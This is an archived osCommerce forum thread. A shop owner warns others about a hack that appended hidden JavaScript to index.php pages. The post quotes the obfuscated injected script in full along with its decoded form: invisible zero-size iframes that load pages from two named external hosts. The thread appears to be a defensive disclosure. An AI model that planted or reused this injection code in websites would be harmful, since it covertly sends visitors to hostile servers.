Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

osCommerce IFRAME html injection Exploit


bluetrope

Recommended Posts

One of my osCommerce sites was recently hacked. It's sneaky: a bit of escaped javascript is inserted at the end of (seemingly) all index.php pages in an osCommerce installation. The code is preceeded by > 80 blanks, so it is not readily visible when editing without wordwrap. Here's the code:

 

<script language=javascript>function func(){if (window.status != " ") { window.status = " "; }} stop = window.setInterval("func()",7);</script><script language=javascript>document.write(unescape('%3c%49%46%52%41%4d%45%20%53%52%43%3d%22%68%74%74%70%3a%2f%2f%63%72%75%6e%65%74%2e%69%6e%66%6f%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%57%49%44%54%48%3d%30%20%42%4f%52%44%45%52%3d%30%20%48%45%49%47%48%54%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%49%46%52%41%4d%45%3e%3c%49%46%52%41%4d%45%20%53%52%43%3d%22%68%74%74%70%3a%2f%2f%6f%6e%6c%69%6e%65%70%72%6f%78%69%65%73%2e%63%6f%6d%2f%6f%75%74%2e%70%68%70%3f%73%5f%69%64%3d%31%22%20%57%49%44%54%48%3d%30%20%42%4f%52%44%45%52%3d%30%20%48%45%49%47%48%54%3d%30%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%49%46%52%41%4d%45%3e'));</script>

 

Unescaped, you have a document.write of:

 

<IFRAME SRC=http://crunet.info/out.php?s_id=1" WIDTH=0 HEIGHT=0 style="display:none"></IFRAME>

<IFRAME SRC=http://onlineproxies.com/out.php?s_id=1" WIDTH=0 HEIGHT=0 style="display:none"></IFRAME>

 

which is doing god knows what on these servers (in Moscow and UK respectively).

 

Beware!

 

Symptoms are cookies originating from crunet.info and onlineproxies.com, and with certain versions of IE6 execution results in a redirect to http:/// and a 404.

 

-RN Snead

Link to comment
Share on other sites

Thank you for warning everyone.

 

Did you install the newest security release that came out about

a week or two weeks ago? I don't know if that release addresses

this problem or not, but thought I'd mention it.

 

Thanks for the warning...

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...